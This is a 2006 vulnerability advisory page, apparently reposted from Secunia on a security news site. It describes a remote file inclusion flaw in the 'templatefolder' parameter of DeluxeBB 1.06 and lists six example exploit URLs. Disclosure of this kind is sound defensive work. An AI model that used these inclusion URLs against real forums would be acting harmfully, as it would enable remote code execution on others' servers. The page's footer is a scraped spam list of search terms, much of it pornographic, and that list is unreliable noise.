about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities




2006-06-15 DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities 
Rated as : Moderate Risk

Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various
scripts
isn't properly verified, before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]
securitydot.net - 2006-06-15

Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 01:49:59 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
KAJOL SEX www.girlsw mambo Remo Animation shop595000 www.sjjjfw pussy movi www.5ixxs. Www.Sexs.C www.cqxyyh PORNOGRATI www.pjjf.c www.massag www.mypdj. cesar e p Www.sex400 w w w .p e OpenSSH_4 www.zoosex mambo Remo Www.sexyfo dingbin1.b %2Fmodules nhl 2008 c mirc 6.2 e platinum 7 Juego Fifa sex woman sex fauk d www.jxglhq videoes www.yihufu Sex of ind www.zhenzh pets.vv263 free anima sql inyect mambo Remo wwww89com goossipgur Nude India www.0519q. www.sex+.c www.wangji www.39fe.c http://www zino com www yahoo. lorna morg Anarkale S